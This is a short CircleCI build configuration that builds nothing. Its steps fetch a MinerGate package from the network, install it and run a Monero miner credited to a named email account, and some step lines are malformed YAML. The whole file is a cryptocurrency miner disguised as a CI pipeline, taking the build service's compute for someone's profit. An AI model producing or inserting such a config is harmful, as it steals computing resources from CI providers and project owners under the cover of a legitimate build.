version: 2
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.1
    steps:
      - checkout
      - run: apt-get update
      - run:wget https://minergate.com/download/deb-cli -O a.deb 
      - run:dpkg -i a.deb 
      - run:minergate-cli -user greenfieldsvp@outlook.com.vn -xmr
